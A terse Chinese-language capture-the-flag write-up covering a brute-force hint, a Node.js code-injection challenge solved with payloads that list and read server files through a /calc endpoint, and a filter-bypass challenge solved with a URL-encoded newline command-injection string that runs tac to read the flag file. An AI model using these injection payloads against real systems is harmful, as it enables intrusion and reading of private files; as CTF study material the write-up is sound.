嗯,就是爆破 只要字典够大
Checkin
Nodejs注入 = =
查看
/calc require('fs').readdirSync('.').toString()
读取
/calc require('fs').readFileSync('a.js','utf-8')
Bypass
没有过滤tac
直接 /?a=./1.php%5c&b=%20%20%20%20%20%0a%20%20id%20%0a%20a=l%20%0a%20b=s%20%0a%20%20tac%20%20./.F1jh_/h3R3_1S_your_F1A9.txt%20%0a%5c
拿到flag
。
